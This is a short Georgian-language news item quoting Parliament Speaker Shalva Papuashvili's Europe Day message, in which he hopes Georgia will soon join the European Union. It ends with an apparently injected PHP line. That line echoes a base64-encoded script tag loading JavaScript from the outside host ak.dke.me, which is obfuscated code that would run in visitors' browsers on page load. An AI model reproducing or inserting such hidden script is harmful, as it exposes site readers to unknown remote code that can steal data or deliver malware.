celsiusi
ავერსი საქკაბელი

 გილოცავთ ევროპის დღეს! მჯერა, რომ საქართველო მალე შეუერთდება ღირებულებათა ერთობით ჩამოყალიბებულ კავშირს, - ამის შესახებ საქართველოს პარლამენტის თავმჯდომარე შალვა პაპუასვილი სოციალურ ქსელში წერს.

როგორც პარლამენტის თავმჯდომარე აღნიშნავს, ევროპის ერთობა ემყარება სუვერენულ ქვეყანათა კავშირს, რადგან სწორედ თავისუფალ სახელმწიფოთა გაერთიანებას შესწევს ძალა ბოროტების დამარცხების.

„მეორე მსოფლიო ომის დამანგრეველმა ანტიჰუმანურმა შედეგებმა ევროპას გაერთიანების იდეა შთააგონა, ისტორიის მკაცრმა გაკვეთილმა ევროპის წამყვან ქვეყნებს მშვიდობისა და ახალი ომების პრევენციის მიზნით ერთობის აუცილებლობა უკარნახა.

დღეისათვის ევროკავშირი 27 ქვეყანას აერთიანებს, რომელთა მიზანს მშვიდობის უზრუნველყოფა და ევროპელი ხალხის კეთილდღეობა წარმოადგენს.

ევროპის ერთობა ემყარება სუვერენულ ქვეყანათა კავშირს, რადგან სწორედ თავისუფალ სახელმწიფოთა გაერთიანებას შესწევს ძალა ბოროტების დამარცხების.

გილოცავთ ევროპის დღეს! მჯერა, რომ საქართველო მალე შეუერთდება ღირებულებათა ერთობით ჩამოყალიბებულ კავშირს, სადაც თითოეული ქვეყანა თავისი თვითმყოფადობითა და ისტორიული გამოცდილებით შეიტანს წვლილს ევროპის მშვიდობის და წინსვლის უზრუნველყოფაში,” - წერს პარლამენტის თავმჯდომარე.

193
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");